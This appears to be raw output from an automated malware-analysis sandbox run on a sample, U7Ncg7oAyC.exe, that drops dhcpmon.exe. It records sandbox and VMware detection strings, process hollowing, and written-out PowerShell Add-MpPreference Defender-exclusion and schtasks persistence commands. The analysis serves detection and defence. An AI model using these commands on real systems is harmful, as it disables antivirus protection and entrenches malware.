        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: Yara matchFile source: 00000013.00000002.384938469.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.427276046.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.306915424.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.410739421.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 6284, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: U7Ncg7oAyC.exe PID: 2860, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5308, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5256, type: MEMORYSTR
        Source: U7Ncg7oAyC.exe, 00000000.00000002.306915424.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, U7Ncg7oAyC.exe, 00000013.00000002.384938469.0000000002831000.00000004.00000800.00020000.00000000.sdmp, dhcpmon.exe, 00000016.00000002.410739421.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, dhcpmon.exe, 00000018.00000002.427276046.0000000002801000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
        Source: U7Ncg7oAyC.exe, 00000000.00000002.306915424.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, U7Ncg7oAyC.exe, 00000013.00000002.384938469.0000000002831000.00000004.00000800.00020000.00000000.sdmp, dhcpmon.exe, 00000016.00000002.410739421.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, dhcpmon.exe, 00000018.00000002.427276046.0000000002801000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exe TID: 6288Thread sleep time: -45733s >= -30000s
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exe TID: 6316Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736Thread sleep time: -10145709240540247s >= -30000s
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exe TID: 5316Thread sleep time: -18446744073709540s >= -30000s
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exe TID: 6348Thread sleep time: -45733s >= -30000s
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exe TID: 5544Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6628Thread sleep time: -45733s >= -30000s
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1036Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5744Thread sleep time: -45733s >= -30000s
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6120Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6952Thread sleep time: -15679732462653109s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6732Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6488Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2320Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exe TID: 468Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5352Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7257
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1385
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeWindow / User API: threadDelayed 5589
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeWindow / User API: threadDelayed 3709
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeWindow / User API: foregroundWindowGot 676
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3341
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5015
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeThread delayed: delay time: 45733
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeThread delayed: delay time: 45733
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 45733
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 45733
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
        Source: dhcpmon.exe, 00000018.00000002.427276046.0000000002801000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: dhcpmon.exe, 00000018.00000002.427276046.0000000002801000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
        Source: dhcpmon.exe, 00000018.00000002.427276046.0000000002801000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
        Source: dhcpmon.exe, 00000018.00000002.427276046.0000000002801000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeMemory written: C:\Users\user\Desktop\U7Ncg7oAyC.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeMemory written: C:\Users\user\Desktop\U7Ncg7oAyC.exe base: 400000 value starts with: 4D5A
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeMemory written: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe base: 400000 value starts with: 4D5A
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeMemory written: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmp43AF.tmp
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Users\user\Desktop\U7Ncg7oAyC.exe C:\Users\user\Desktop\U7Ncg7oAyC.exe
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp6DAD.tmp
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp7772.tmp
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Users\user\Desktop\U7Ncg7oAyC.exe C:\Users\user\Desktop\U7Ncg7oAyC.exe
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LYKZypsugb.exe
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmpE07C.tmp
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
